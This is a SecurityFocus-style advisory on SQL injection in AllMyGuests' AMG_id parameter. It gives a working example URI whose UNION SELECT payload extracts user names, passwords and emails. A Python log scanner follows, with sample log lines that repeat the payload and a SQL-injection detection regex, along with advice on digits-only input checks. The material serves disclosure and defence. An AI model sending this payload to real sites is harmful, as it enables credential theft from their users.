Voice of Web AllMyGuests 'AMG_id' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
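For defenders reviewing web server logs, the following added example (not part of the original advisory or of AllMyGuests) flags requests whose AMG_id value is not a plain decimal number. It assumes AMG_id is normally a numeric identifier and that logs are in combined log format; the log lines and the names scan, classify and SAMPLE_LOG are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); line 2 carries the page's URI.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1-- HTTP/1.1" 200 6044',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=null%20uNiOn%20SeLeCt%201,2 HTTP/1.1" 200 4811',
    '192.0.2.77 - - [01/Jan/2010:10:01:30 +0000] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=abc HTTP/1.1" 200 4790',
    '192.0.2.10 - - [01/Jan/2010:10:02:00 +0000] "GET /allmyguest/index.php?AMG_open=list HTTP/1.1" 200 3011',
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# SQL constructs that have no place in a numeric id (assumed rule set, tune as needed).
SQL_TOKENS = re.compile(r"\bunion\b.*\bselect\b|--|/\*|\bconcat(?:_ws)?\s*\(", re.I | re.S)


def classify(value):
    """Return None for a plain decimal id, otherwise a verdict string."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    return "sqli-pattern" if SQL_TOKENS.search(value) else "non-numeric"


def scan(lines):
    """Return (line_no, client, verdict, decoded_value) for each suspicious AMG_id."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs undoes '+' and %XX encoding, so encoded variants are compared decoded.
        for value in parse_qs(query, keep_blank_values=True).get("AMG_id", []):
            verdict = classify(value)
            if verdict:
                hits.append((line_no, line.split()[0], verdict, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allow-list rule (digits only) is the input check the application itself should apply to AMG_id before the value reaches a query.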


 

Copyright 2010, SecurityFocus